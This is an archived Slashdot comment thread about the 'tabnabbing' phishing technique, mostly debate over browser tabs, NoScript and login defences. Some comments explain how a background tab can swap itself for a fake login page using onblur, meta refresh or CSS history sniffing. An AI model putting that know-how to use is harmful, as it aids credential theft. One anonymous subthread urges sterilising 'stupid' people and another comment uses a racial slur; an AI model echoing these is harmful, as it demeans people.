My two cents as far as tabs go, is that a window should be a window - not a collection of tabs - for the simple reason that tabs obfuscate (hide) the content within. Yes, I can see the advantages of tabs within some UIs in certain situations - for example: segmenting "general" from "advanced" preferences; stepping data through a process, or in a rich client application where data is related.
Where tabs are a bad fit for browsing is that the data viewed in web apps is often too disparate - there is no linkage between any of the tabs within a "window" - the content of what is presented within is asynchronous and disconnected - tabs in browsers never have a true relationship with each other. Sure - you might be looking at two related sites, or two pages within a site, but tabs offer nothing (UI-wise) that a window cannot do. A new window offers a single view of a chunk of information; if you need another view, why not simply use another window. A mish mash of windows filled with tabs does not improve the UI in any way.
1. Re:Solution... by Quantumstate · 2010-05-25 01:25 · Score: 1
  
  Tabs usefully group views, so I can open a window which I use for looking up some maths things, another for slashdot stories perhaps. Also current window managers aren't designed for having that many different windows open, so many applications use the tabbed approach like editors/ides.
  Tabs can provide a specialized interface for web browsing such as tree style tabs which works very well, providing another level of organisation.
2. Re:Solution... by The_mad_linguist · 2010-05-25 01:28 · Score: 1
  
  Because I can avoid filling up my list of windows with dozens of instances of firefox when I'm working on a research project. If I have a bunch of tabs open, and only one window, it's far quicker to switch between open office text and back.
3. Re:Solution... by Anonymous Coward · 2010-05-25 01:30 · Score: 0
  
  This isn't limited to tabs. This works with multiple browser windows as well, the only requirement is window.onblur.
4. Re:Solution... by Iamthecheese · 2010-05-25 01:38 · Score: 1
  
  It certainly does improve the UI. Tabbing covers up the Windows UI problem of not being able to tell the documents you have open if you have enough of them. It does this by using extra screen real estate.
  If I open 50 Opera windows I'll see "Opera" in each button in my taskbar but unless I want to change my taskbar size dynamically not the site name or that little icon for the site. If I open 50 Opera tabs than at the top of my screen I'll see all those little icons, which lets me click on the right tab.
  
  --
  If video games influenced behavior the Pac Man generation would be eating pills and running away from their problems.
5. Re:Solution... by bhtooefr · 2010-05-25 01:38 · Score: 1
  
  Because most OSes have very poor window management, and Alt-Tab gets REALLY ANNOYING when you've got 50 windows open, 30 of them browser windows. Tabs at least give you Ctrl-Tab as an option for navigating the browser windows.
  (Alternately, there is always the Mac route, where Cmd-Tab switches programs, and Cmd-` switches windows within a program.)
6. Re:Solution... by milgr · 2010-05-25 01:44 · Score: 1
  
  The tabs are related... they are all web pages. I have about 25 tabs open in each of 2 Firefox windows. I also have numerous other windows on each of 7 virtual screens on each of 2 physical screens. Before the days of tabs, it was challenging to find the correct window. Now, for a web page I merely look in my browser tab list.
  Hmm... maybe I should create a new SELinux sandbox for Firefox for each web page I visit, and avoid tabs.
  
  --
  Where law ends, tyranny begins -- William Pitt
7. Re:Solution... by jamesh · 2010-05-25 01:58 · Score: 1
  
  My two cents as far as tabs go, is that a window should be a window - not a collection of tabs
  And what is the task bar in Windows? I used multiple windows before the days of tabs, and they just ended up being a bunch of 'tabs' in the task bar, mixed in with a whole load of things even less related. I have 30 tabs open right now in firefox, and about 35 windows. If I could find a good tabbed version of putty i'd use that and it would cut down my window count by about 12.
  
  I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.
  So... having used non-tabbed and tabbed browsers, and greatly preferring tabs, I should stop using them because they "break a heap of good UI principles"? Take a guess where you can stick your principles :)
8. Re:Solution... by value_added · 2010-05-25 02:05 · Score: 1
  
  I have about 25 tabs open in each of 2 Firefox windows. I also have numerous other windows on each of 7 virtual screens on each of 2 physical screens.
  Out of curiousity, what is it that's open in those 25 tabs?
  I've never encountered a reason to open more than a handful at a time. I can't even imagine opening that many multiplexed terminals in screen, irrespective of how many jobs I was running, or how many systems I was working on.
9. Re:Solution... by OneAhead · 2010-05-25 02:10 · Score: 1
  
  Well, some people like to browse many sites at the same time. In the pre-firefox days, I used to have a gazillion windows open, which made it really annoying to switch to another task. When firefox came out with it's tabbed browsing, I felt it was the best thing since sliced bread.
  Now, disabling tabbed browser would bring me back to the bad old days of multiple open windows. However, the exploit would still work as advertised, only with windows instead of tabs. In this respect, "tabnabbing" is a bit of a misnomer, one could argue it should be "window nabbing". I guess this shows how popular tabbed browsing is.
10. Re:Solution... by phiwum · 2010-05-25 02:19 · Score: 1
  
  Simple solution - don't use tabs in browsers.
  
  I don't think this solution fixes anything. As near as I can figger, the guy that uses multiple windows (instead of tabs) is just as vulnerable to this issue as the tab user --- assuming that his top window(s) block the view of other browser windows entirely. The only real issue I see in the article is that, when your attention is diverted from a page and it is hidden from your view, its contents may be changed.
  So, tabs are, as far as I can, a red herring here. It's not really about tabs at all. (Someone may correct me if I've missed something.)
  
  The first thing I do to any browser I sit in front of, is to immediately disable the use of tabs. I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.
  Thank goodness that your loyalty to UI principles does not restrict my browser's features. I don't want a dozen browser windows, taking up space on the screen and making it difficult to find what I want. I want one window with tabs that have visible icons and (partially visible) titles, so that I can pick the right tab quickly.
  Maybe it is an inconsistent use of the ideas of tabs, but it's damned useful nonetheless.
  In any case, your primary criticism about tabs has nothing to do with this security issue.
  
  --
  Phiwum's law: anyone that names an obvious law after himself and then puts it in his own sig is just pathetic.
11. Re:Solution... by Qzukk · 2010-05-25 03:12 · Score: 1
  
  Simple solution - don't use tabs in browsers.
  So, how many windows do you have open before you forget whether or not you logged into gmail in one of them? Did you memorize the position of the gmail window on your task bar, or are you going to alt-tab through them and stop at the first one that tells you you've been logged out of gmail and need to log in again?
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
12. Re:Solution... by satoshi1 · 2010-05-25 03:50 · Score: 1
  
  If I'm doing research or looking up API, I can easily hit 30-40+ tabs. I'll open a bunch of search results in tabs and then filter them. I keep the best ones open, and then look up the next thing I need to know. Eventually I've got everything I need right there, and it's really easy to switch between them all.
13. Re:Solution... by Garble+Snarky · 2010-05-25 04:01 · Score: 1
  
  Why stop at windows? You should have a separate monitor for each application. That's the only way to prevent all content from ever being obfuscated.
14. Re:Solution... by Kazoo+the+Clown · 2010-05-25 08:31 · Score: 1
  
  Simple solution - don't use tabs in browsers. The first thing I do to any browser I sit in front of, is to immediately disable the use of tabs. I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.
  HEAR HEAR. I've always hated browser tabs, for pretty much the same reasons. I suppose if you are running a browser on a system that doesn't do anything else but web browse, they're fine, but tabs should combine any function you might be doing, not just on the web (document editing, etc.) So on Linux and on Windows at least (and I suspect on the Mac as well), they're completely redundant and don't integrate with the OS very well in that regard (if you hadn't noticed, the TASKBAR implements the equivalent of tabs, and I move it to the left-hand-side of my screen so that there's more useful real-estate for that purpose). I gave up on Firefox for that reason, as while it supposedly has a tab disable, it is incomplete as pages still end up opening on tabs now and then-- I moved to K-Meleon, and while based on the Firefox source base it doesn't seem to have that problem...
15. Re:Solution... by Anonymous Coward · 2010-05-25 12:42 · Score: 0
  
  Why do you use windows? When a window is covered by another window, that obfuscates the content within. And all those windows together obfuscate the desktop. Windows are disconnected and asynchronous between them. It's so confusing. Why can't all desktops be like an old-style phone, where you can only do one thing at a time, and do it well? Our brains are just not made for parallel processing and keeping stuff in the background to get back to it later. When you eat, eat. When you tweet, tweet.
Noscript by Wonko+the+Sane · 2010-05-25 01:16 · Score: 3, Informative

This attack only works if you allow Javascript by default, instead of only whitelisting sites that you trust.
1. Re:Noscript by 0ld_d0g · 2010-05-25 01:46 · Score: 1
  
  Agree, but sometimes JS files are hosted off separate domains, etc, making white-listing a pain.
2. Re:Noscript by Anonymous Coward · 2010-05-25 03:02 · Score: 0
  
  God I love this add-on, it stops so very many of these things.
3. Re:Noscript by PRMan · 2010-05-25 03:12 · Score: 1
  
  Noscript FTW!
  
  --
  Peter predicted that you would "deliberately forget" creation 2000 years ago...
4. Re:Noscript by ShadowRangerRIT · 2010-05-25 03:45 · Score: 1
  
  Or you're so used to occasional websites that are completely unusable without JavaScript that you are willing to temporarily whitelist them.
  
  --
  $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
5. Re:Noscript by carp3_noct3m · 2010-05-25 03:58 · Score: 1
  
  One more reason I love noscript.
  
  --
  "It's ok, I'm completely secure as long as my iron is off"
6. Re:Noscript by Animats · 2010-05-25 04:24 · Score: 1
  
  This attack only works if you allow Javascript...
  You could do this with a <meta refresh> tag, have the server recognize the refererring page, and load the new, hostile page. This attack doesn't need JavaScript.
7. Re:Noscript by Wonko+the+Sane · 2010-05-25 04:47 · Score: 1
  
  That would be less effective, as that way there's no assurance that the target isn't viewing the tab when it refreshes.
8. Re:Noscript by Anonymous Coward · 2010-05-25 04:50 · Score: 0
  
  Also if you use a good password manager that only auto-fills on the correct domain name you would not be vulnerable to this type of attack. I use 1password on the mac which works pretty well.
9. Re:Noscript by Hurricane78 · 2010-05-25 05:13 · Score: 1
  
  And guess which sites will include this via cross-site scripting?
  Exactly. The big sites that you trust. ^^
  That’s why NoScript is pointless. The biggest sites are also attacked and hacked the most. If you disable JS there, you could as well just disable it everywhere.
  
  --
  Any sufficiently advanced intelligence is indistinguishable from stupidity.
10. Re:Noscript by Animats · 2010-05-25 05:37 · Score: 1
  
  there's no assurance that the target isn't viewing the tab when it refreshes.
  True, but phishing, like spamming, is a high-volume low-success-rate scam. It doesn't have to work all the time.
11. Re:Noscript by TorKlingberg · 2010-05-25 06:24 · Score: 1
  
  Couldn't this be done with Meta-Refresh?
12. Re:Noscript by Anonymous Coward · 2010-05-25 08:19 · Score: 0
  
  I don't think you'd need JavaScript at all to execute this kind of attack. A simple meta refresh tag and some CSS that tells the server which sites you have visited should do the trick.
  http://ha.ckers.org/weird/CSS-history.cgi
Can Javascript do this? by Yvan256 · 2010-05-25 01:17 · Score: 1

Can Javascript really access other tabs or windows? Shouldn't it be restricted to its own page/tab/window?
1. Re:Can Javascript do this? by Anonymous Coward · 2010-05-25 02:06 · Score: 0
  
  It probably should be restricted, and maybe it is in some browsers. Anyway, I think tab process separation in IE and Chrome should indirectly prevent this exploit. Browser tabs in multiple processes would be unable to communicate, and a Javascript tab-interprocess ability is (AFAIK) an unwarranted feature and therefore unlikely to exist.
2. Re:Can Javascript do this? by canajin56 · 2010-05-25 02:23 · Score: 1
  
  It's not changing another tab. Here's how it works: Somebody posts a link to "Cute cat pictures!" which is just a website with a bunch of pictures. You click it, you look around, you laugh, you go back to facebook (and here's the important part) without closing the cat pictures tab. Hours later you look back at that tab and it's your banks login page. Now, hopefully almost everybody will see that and go "I never opened that tab", and also notice that the URL is wrong. However, there will probably be enough morons who say "Oh, convenient, I needed to pay my bills!" and login immediately. The script never has to touch a tab other than the one it's running in.
  
  --
  ASCII stupid question, get a stupid ANSI
3. Re:Can Javascript do this? by Qzukk · 2010-05-25 03:16 · Score: 1
  
  Can Javascript really access other tabs or windows
  No.
  The attack here is that you have 50 tabs open, and suddenly tab 32 (the tab that was supposed to be a funny cat video but was running the Evil Script) turns into a facebook login page saying that your session expired. Were you logged into facebook on tab 32? Are you SURE?
  Don't use facebook? That's OK, the :visited CSS hack can be used to pick a login screen that you do use.
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
4. Re:Can Javascript do this? by delinear · 2010-05-25 03:26 · Score: 1
  
  Yes, JavaScript has always been able to do this, and while it might provide slightly better security to not allow a script in one window to alter another window, there are legitimate uses that would have to be worked around (and eventually you have an entirely secure system that nobody can use at all, the line has to be drawn somewhere).
5. Re:Can Javascript do this? by Anonymous Coward · 2010-05-25 03:30 · Score: 0
  
  Yes, in fact controlling multiple windows in JavaScript is quite trivial. If the code on Window1 opens Window2 in JavaScript (and you can substitute Tab1 and Tab2 for this as well), then Window2 need only call "self.opener" or "self.parent" to access Window1. There may be some subtle differences between "self.opener" and "self.parent", but those are an exercise for the reader (read: too damn lazy to look it up right now).
6. Re:Can Javascript do this? by vlueboy · 2010-05-25 03:40 · Score: 1
  
  Having various tabs open, I've seen thumbnail image sites where requesting a special image opens up a single large popup window for the entire site. All my tabs for the site send image updates to just the one popup, without opening other unecessary ones until I close it. Since most sites lack this discriminate control over how they open and control one a separate window, I'd say "yes." They probably do it by window title or something.
  Submarine features are scary... HTML5 enables sites to save data to a mandatory browser-side DB (see "todo" lists, for example.) Though this has even more potential than cookies for misuse, Safari and Firefox currently auto-allow the feature and give you no control over it.
7. Re:Can Javascript do this? by Yvan256 · 2010-05-25 06:29 · Score: 1
  
  No control over it?
  Safari -> Preferences -> Security -> Database Storage (Set to "None")
8. Re:Can Javascript do this? by vlueboy · 2010-05-25 08:06 · Score: 1
  
  The browser's option fails to give context and mention HTML5, but thanks. My version says, more or less, "Default storage to save databases" and defaults to 100MB.
9. Re:Can Javascript do this? by Anonymous Coward · 2010-05-25 12:13 · Score: 0
  
  It is restricted to its own tab. It changes the content of its own tab when the tab loses focus (window.onblur event).
Losing your cookies every 24 hours by tepples · 2010-05-25 01:27 · Score: 1

like you said, you are logged into Facebook right now. Would you not find it suspicious if when you clicked back over to it, you were greeted with a login screen?
A lot of web sites periodically invalidate session cookies after 24 hours. In that case, the next link you click even on the legitimate site will present a login screen.
Re:MOD PARENT DOWN by scamdetect · 2010-05-25 01:37 · Score: 0, Troll

Not trolling, just peeved that my link was ripped out yet the body of the story is identical
Awesome ! Thanks for the tip. by Anonymous Coward · 2010-05-25 01:39 · Score: 0

Now to get to work. Those accounts aren't just going to empty themselves now are they?
Re:Greeted with Logins by Anonymous Coward · 2010-05-25 01:42 · Score: 1, Interesting

No, because this is REALLY dangerous for Yahoo Mail.
I'm logged in, and it likes to revert back to login pages all the time! It even makes you login twice "to check your security". So this TabMcNab exploit is going to be really dangerous somewhere. I'm pretty sharp, but that page has cried wolf so many times I would have fallen for this if it was grade-A delivered.
Re:MOD PARENT DOWN by Anonymous Coward · 2010-05-25 01:44 · Score: 0

You're trolling. This is CmdrTaco's site. Just be glad kdawson didn't get your story, or he would have put "pwned" in the title. Your link doesn't matter. Get over it.
Protect Those Morons ... for some reason by Anonymous Coward · 2010-05-25 01:46 · Score: 1, Insightful

i am so goddamned tired of hearing these stories that say "oh noes, stupidity might be painful, what will we do, it's so terrible, simpwy tewwible!" if you are stupid you should not breed. if you are stupid, nature has only ever had one cure for that, a little good old Darwinism natural selection. why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?
1. Re:Protect Those Morons ... for some reason by Anonymous Coward · 2010-05-25 01:50 · Score: 0
  
  ... why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?
  Certain 'officials' would not get elected if that was to happen. Doesn't matter which party.
2. Re:Protect Those Morons ... for some reason by Anonymous Coward · 2010-05-25 02:12 · Score: 1, Insightful
  
  ... why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?
  Certain 'officials' would not get elected if that was to happen. Doesn't matter which party.
  that's one of the many network effects of having so many stupid people. we should have thought a whole lot harder about protecting people from themselves and defeating natural selection. making hard drugs illegal, putting warning labels on rat poison telling people not to eat it, labels on coffee telling people that a drink prepared with boiling water is hot, food stamps and WIC and other programs that don't first require that the men get a vasectomy and the women get their tubes tied, "fat acceptance" movements, and the notion that a homeowner could ever be held responsible for shooting an intruder who breaks into his home are just a few examples.
3. Re:Protect Those Morons ... for some reason by obyom · 2010-05-25 03:08 · Score: 1
  
  why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?
  Why surgically?
4. Re:Protect Those Morons ... for some reason by BillGod · 2010-05-25 03:34 · Score: 1
  
  I think we should to nothing. No one should run antivirus! No firewalls. Nothing I hate them all. I think the virus makers should make more and more and more viruses every day. Infect the world!!! Oh yeah BTW I own a computer repair store so I might be a little biased :)
  
  --
  MISSING - Sig file. 2 years old black and white and very funny. If found please email me.
5. Re:Protect Those Morons ... for some reason by ckaminski · 2010-05-25 03:59 · Score: 1
  
  Intelligence has never had anything to do with Darwinism. Probably quite the opposite. The intellectuals proslethize while the neanderthals fuck everything that moves.
6. Re:Protect Those Morons ... for some reason by BurtCrep · 2010-05-25 04:08 · Score: 1
  
  why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?
  Because...
  You said it: they're morons with money. It's that same money banks need in order to keep growing. And as you know, growth of your customer base is the foundation of capitalism. You can't even sterilize them, that would be bad for business...
7. Re:Protect Those Morons ... for some reason by TheCrayfish · 2010-05-25 04:44 · Score: 1
  
  Your comment assumes that stupidity is the lesser-fit adaptation compared with intelligence. I'm not sure nature supports that assumption. Cockroaches are significantly stupider than humans, and yet they are clearly the more successful species, at least in terms of numbers and longevity, from a Darwinian point of view. Have you noticed that "stupid" people seem to reproduce faster and in greater numbers than "intelligent" people? Personally, I think the jury remains out on whether intelligence of the kind humans possess represents an evolutionary advantage in the long term.
  
  --
  
  The Big News Page
8. Re:Protect Those Morons ... for some reason by Anonymous Coward · 2010-05-25 05:00 · Score: 0
  
  ... why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?
  Certain 'officials' would not get elected if that was to happen. Doesn't matter which party.
  Let's sterilize them in too just to be safe.
9. Re:Protect Those Morons ... for some reason by Golddess · 2010-05-25 06:14 · Score: 1
  
  Intelligence of the kind humans process has gotten us off this mudball. Maybe there are "better" kinds of intelligence, but in the extreme long term (5 billion years or so), this most certainly represents an evolutionary advantage over any other species living today.
  
  --
  "I'm not sure I like the fugnutish tone you used in your post!" -RogL (608926)-
10. Re:Protect Those Morons ... for some reason by neomunk · 2010-05-25 09:26 · Score: 1
  
  Personally, I think the jury remains out on whether intelligence of the kind humans possess represents an evolutionary advantage in the long term.
  Not if you take the phrase "long term" and extrapolate what that really means. I think that human intelligence is/will be needed if higher life is to survive on any real "long term". It would help greatly in surviving a truly catastrophic (read: apocalyptic) natural disaster, and is utterly required for the species to survive something on the order of Earth's destruction.
  Maybe it's not that beneficial to mid-term survival (or at least not PERSONALLY beneficial, the benefits of intelligence being mostly shared with the community at large) but in an actual long-haul look at survivability, I think it's the ONLY beneficial mutation that will matter.
  This is assuming, of course, that sea turtles don't become space turtles before the evolutionary make-or-break event comes to pass.
11. Re:Protect Those Morons ... for some reason by not+flu · 2010-05-25 10:26 · Score: 1
  
  Neanderthals were the ones with bigger brains than ours that went extinct.
12. Re:Protect Those Morons ... for some reason by Boomshadow · 2010-05-26 00:24 · Score: 1
  
  Our brains have not gone extinct (at least mine hasn't)! They're just endangered.
13. Re:Protect Those Morons ... for some reason by TheCrayfish · 2010-06-07 04:44 · Score: 1
  
  in the extreme long term (5 billion years or so), this most certainly represents an evolutionary advantage over any other species living today.
  I only quibble with your use of the word "certainly." We won't know whether human intelligence represents an evolutionary advantage over other Earth species until (and if) our species manages to successfully relocate to another planet.
  
  --
  
  The Big News Page
Server delayed HTTP response as a push by roman_mir · 2010-05-25 01:47 · Score: 2, Interesting

Even if the scripts are completely disabled on the page, what about a delayed HTTP response, in effect a push to the browser by a server that is done sometime after the page is loaded as a delayed response to the browser request?
It's really hard to avoid all possible scenarios on how a page can be changed from something to something else.

--
You can't handle the truth.
1. Re:Server delayed HTTP response as a push by Smallpond · 2010-05-25 02:21 · Score: 1
  
  You would have the annoying "Firefox Freeze" waiting at 99% for the page to finish loading. However, this is so common that nobody would notice.
2. Re:Server delayed HTTP response as a push by nmg196 · 2010-05-25 02:24 · Score: 1
  
  There is no such thing as HTTP "push" (well, there is, but it's not what you're suggesting). Once the page finishes loading, that's it - no more data. You cannot open a connection to a browser from a server after the page has finished loading.
3. Re:Server delayed HTTP response as a push by roman_mir · 2010-05-25 02:36 · Score: 1
  
  There is no HTTP push, but I can set a response to be delayed and send the data into the browser upon a server event, it's better than browser polling, but results in the browser displaying the 'loading' status until the response is complete and it does not reliably work through proxies.
  
  --
  You can't handle the truth.
4. Re:Server delayed HTTP response as a push by dotancohen · 2010-05-25 09:23 · Score: 1
  
  You would have the annoying "Firefox Freeze" waiting at 99% for the page to finish loading. However, this is so common that nobody would notice.
  Please comment on this Firefox bug, the Mozilla folks just don't believe me that this bug exists:
  https://bugzilla.mozilla.org/show_bug.cgi?id=434180
  Thanks!
  
  --
  It is dangerous to be right when the government is wrong.
AND if ... by khasim · 2010-05-25 01:59 · Score: 1

Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.
AND if you're not using noscript (or equivalent) or you allow that site to run whatever javascript it wants. And so forth.
Possible Solution - whitelisting? by Jahava · 2010-05-25 02:05 · Score: 1

So this is a pretty clever thing to do. The issues here are that it's sneaky, remarkably effective (even against those who are security-aware), and difficult to stop, since tabbed browsing is generally regarded as a good thing.
One possible solution would be to have browser support for user-opted website whitelisting. When you visit a site where you require security (banking, etc.) for the first time, you can configure your browser to add the domain to a security-aware whitelist. Every time, from then on, when you visit that page, your browser visually (and obviously) marks that page (gold border, animated lock, etc.) if its SSL credentials check out. As a user, I would simply have to know "always check for those visual effects before you enter your banking information", which is not a hard thing to remember.
Another would be to have a browser-supplied interface for entering credentials that can be invoked by the site. You click the log-in button, your browser supplies a "Guaranteed Secure" login modal dialog, you enter your information, and your browser then forwards it to the page and logs you in. You can then add important domains to the list, and your browser will never pop-up that dialog for a page that isn't on that list. Same as above, you would elect to whitelist sites that are important in advance, and because it's a browser-supplied login, no fake tab (or fake SSL certificate) will be able to induce that dialog.
At some point, people will figure out clever ways around things. The browser needs to be able to accommodate the idea that every page on the Internet is not equal from the point of view of the user. There must be a mechanism by which the browser can allow a user to easily (visually) differentiate between a legit page and one that has made itself look legit.
1. Re:Possible Solution - whitelisting? by Anonymous Coward · 2010-05-25 03:05 · Score: 0
  
  Don't be such a racist, no-one is going to get away with whites only websites.
  Now, I will type the word in the image to prove I'm not a nigger.
Why is this about tabs at all? by phiwum · 2010-05-25 02:13 · Score: 1

As far as I can tell, the script merely waits a while (hoping that the user's attention is diverted) before changing the contents. Surely, the same idea works about as well if the user uses multiple windows rather than multiple tabs. Just as soon as attention is diverted from the appropriate browser and it is covered by other windows, the content could be changed without the user noticing.
The only difference is that, with multiple windows, a portion of the window may still be visible when the user is looking at another window. In my limited experience, folks tend to maximize windows anyway (I *hate* that!), so that's not a significant issue.
Am I missing something?

--
Phiwum's law: anyone that names an obvious law after himself and then puts it in his own sig is just pathetic.
1. Re:Why is this about tabs at all? by ShadowRangerRIT · 2010-05-25 03:51 · Score: 1
  
  All you're (possibly) missing is that a proper implementation wouldn't use a fixed wait. It would set a timer to make the switch after a window.onblur event, and execute the switch only if the window remains "blurred" the whole time. You don't need to guess at when the user is distracted, you just need to tweak the delay to increase the odds that they forget the contents of the tab. Tabs aren't required; minimizing would work just as well, and possibly even being hidden by other windows (not sure of the exact specs for window.onblur), but the most common case where someone forgets the contents of a tab is when they've got 20+ tabs open. So if it's mostly enabled by multiple tabs, and only likely to work with multiple tabs, it's not unreasonable to identify it with tabbed browsing.
  
  --
  $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
2. Re:Why is this about tabs at all? by phiwum · 2010-05-26 01:58 · Score: 1
  
  Thanks. According to http://www.java2s.com/Tutorial/JavaScript/0380__Window/windowonBlur.htm, onblur is triggered whenever focus is lost, so it seems to me that moving focus to another window would similarly work for this phishing attack.
  
  --
  Phiwum's law: anyone that names an obvious law after himself and then puts it in his own sig is just pathetic.
you misunderstood ssl. by leuk_he · 2010-05-25 02:17 · Score: 1

You are not to blame, because even the browser creators misunderstand ssl.
-Ssl does not mean that it is save to input credentials.
-More gui does not not help much.
-If a site makes an error with ssl (expired, or changed subdomain) you only have a all or nothing option.
As your parent article states, there already is an option to only enable javascript on trusted sites, (noscript), but this relies on whitelisting particular sites. Only securityparapoid people (like me) use it.
tabnappers by Anonymous Coward · 2010-05-25 02:31 · Score: 0

and here I thought the article was about falling asleep on your keyboard while waiting for IE to bring up the next tab....
I know, I use IE. It's not my fault. The government is forcing it on me. I also get to literally watch my html scan in as McCrapafee HBSS IPS grab my CPU by the neck and chokes the life out of it.
Stop using web-based login forms by japonicus · 2010-05-25 02:36 · Score: 0

A way to mitigate against tabnapping (and a lot of other phishing) would be for web sites to use http authentication rather than 'pretty', but easily spoofed web page login forms. That way it's quite clear what page you're trying to log in to becuase login is through a hard-to-simulate browser dialogue box which states the target web address. Even quite clueless users might start looking more closely when phisingsite.example.com starts prompting them to log in.
Re: Tab Mix Plus doesn't work well enough by TaoPhoenix · 2010-05-25 02:43 · Score: 2, Informative

I tried it out and Protected/Froze/Locked the tab and the exploit ran.
I think it's because the full contents were loaded and it didn't actually try to navigate anywhere.

--
My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
Opera or Firefox with NoScript stops this attack by Anonymous Coward · 2010-05-25 02:45 · Score: 0

Use Opera's script blocker or NoScript on Firefox to stop this type of attack.
Also on the proof of concept's page, the contents changed to look like Gmail. The favicon and the address stayed the same. Tested on Opera.
Many AJAX sites depend on similar functionality. I recommend whitelisting JavaScript allowed sites on your browser.
Tabs are bad for you by Anonymous Coward · 2010-05-25 02:46 · Score: 0

My brother always told me that tabs were bad
STDs... by Anonymous Coward · 2010-05-25 02:55 · Score: 0

Call these surfingly-transmitted diseases. It's amazing how apt "safe sex" is here. You need to not only consider that promiscuity will catch you something nasty, but that promiscuity of your partner (the website) will do so too.
I'm a paranoid computer scientist who has been anticipating these vulnerabilities for as long as I've seen the web being corrupted with "active content" designs. I start browser sessions frequently throughout the day. I do not persist any cookies between sessions. I use NoScript (as of late) and privoxy (for many years) to block out most potential content. I use GNASH rather than Adobe flashplayer. I use xpdf rather than Adobe acroreader. I have a mental model of trust equivalence classes for all sites I visit, and I never mix trust classes into the same browser session. For critical stuff like banking, I never open more than one website per session, not even trusting one bank nor credit card site to run alongside another, even though they both control my money to some degree.
Lately, I have been considering that my methods may not be secure enough, so I may start using additional user accounts with separate browser state on the filesystem, to better sandbox the browser from my working data and from other browser instances.
Auto log off by abbynormal+brain · 2010-05-25 03:13 · Score: 1

It's conceivable, especially under this circumstance, that an already open (let's say) Gmail page is re-written. What's the first thought that might come to mind? Oh, it auto logged off - only to have people "log back in". Agreed. This issue has potential. Bring out the fixes - soon!

--
L'esperienza de questa dolce vita (The experience of this sweet life) - Dante Alighieri, The Divine Comedy
Slashdot's catering to its CRONIES? by Anonymous Coward · 2010-05-25 03:31 · Score: 1, Interesting

"Slashdot is about news, not driving traffic to someone's website. And 'getting traffic' is not some kind of exchange or reward offered for submitting an article. If a different link is editorially better, then it is expected that the editors will swap it." - by mysidia (191772) on Tuesday May 25, @09:42AM (#32335284)
Ahem: BULLSHIT! Slashdot's altering scamdetect's post is doing EXACTLY WHAT YOU ACCUSE SCAMDETECT OF (basically): Slashdot's editors altering scamdetect's source data is directing traffic to a "crony" of these so-called story editors' favorite/pal/affiliate (their crony in other words) site imo @ least... taking/playing "favorites" in essence.
Krebs on security appears to be a "crony" (or what's the word SEO optimization scammers use? Oh, yes: "Affiliates") of the editors here!
AGAIN: The editors here are in fact violating what you said yourself about "driving traffic to someone else's site" (which is EXACTLY what they're doing by taking out the url link that spamdetect put up, and putting in one of the slashdot editors' own choice instead).
After all - Neither Kreb's article (dated Monday, May 24th, 2010 at 9:07 pm) nor the one scamdetect put up (dated today, Tues. May 25th, 2010) are the original discoverers of this material, so neither one's date data really matter either, as to "whom posted what first"!
Nor is either one better than the other, imo @ least, editorially!
(Now, as far as MY credentials in this field? Ok - I am a multiply degreed college grad here no less in both CSC & MIS, complete with all the English you'd ever need in both of those degrees I have on the subject of computer sciences (along with 16 yrs. of professional experience on my part & being multiply internationally published for my works in this science, plus being featured as tech shows like MS TechEd 2 yrs in a row as a finalist for commercial code work & ideas in the hardest category there in SQLServer Performance Enhancement while on paid contract to do so increasing the programs used effectiveness by 40% or more (block level device driver work & data structuring in said commercial wares of "Enterprise Class" scale classification) for them no less also)).
I wonder who is more qualified on the subject of computing here... myself, or the "editors of slashdot"? I say that, because I disgree with your statements/thoughts, strongly, and I wager that the story editors here aren't even as qualified on this science & subject as I am (nor moreso on their parts in English either).
Secondly: What exactly qualifies Slashdot's editors as to "what's better editorially"?
Again - Do they have degrees in English to substantiate that they themselves are "expert" on what's better, editorially??
I'd wager not.
Man - You're the pot calling the kettle black man!
(Plus, this isn't the first time I have seen this type of shenanigan out of slashdot (or other news websites) either!)
This happens ALL THE TIME (in catering to "partners/affliates/favorites" (spelled sideways = CRONIES!)), & I also feel it's wrong as well.
APK
P.S.=> Bottom-line? Well, I also think scamdetect has every right to be upset that his submission was altered by the story editors here, as to the link submitted data as the source, because I'd actually wager that Brian Krebs may no more qualified as an expert in this area than are the folks that scamdetect originally initially used as his source data in fact - unless someone can show me that Brian Krebs has his CISSP certification, or an actual A.A.S. or B.S. (or better in post grad masters or doctoral work) in CSC related disciplines (or, those CSC degrees specifically those related to computer security actually)... apk
1. Re:Slashdot's catering to its CRONIES? by NeutronCowboy · 2010-05-25 05:06 · Score: 1
  
  Slashdot's altering scamdetect's post is doing EXACTLY WHAT YOU ACCUSE SCAMDETECT OF
  Ah.... the moral relativism argument. How do I miss thee.... wait, I don't. It's guaranteed to be brought up by some nincompoop who missed Logic and Philosophy in his education. Krebsonsecurity is better, if for no other reason that it is better known.
  All in all though, this was one of the most entertaining AC trolls I've read in a long time. I don't know if it is the foaming-at-the-mouth superiority complex, the irony of his bitching about the English skills of the editors, the complete incoherence of the entire post, or the double-bracketed, full-paragraph, single sentence diatribe about his irrelevant qualifications, but this AC kept me reading right to the end. I was actually kinda disappointed it ended.
  I'd give funny mods if I'd have them.
  
  --
  Those who can, do. Those who can't, sue.
2. Re:Slashdot's catering to its CRONIES? by mysidia · 2010-05-25 12:48 · Score: 1
  
  Krebs on security appears to be a "crony" (or what's the word SEO optimization scammers use? Oh, yes: "Affiliates") of the editors here!
  You have evidence of this accusation against the integrity of Slashdot's Editors and (therefore) the Slashdot site itself?
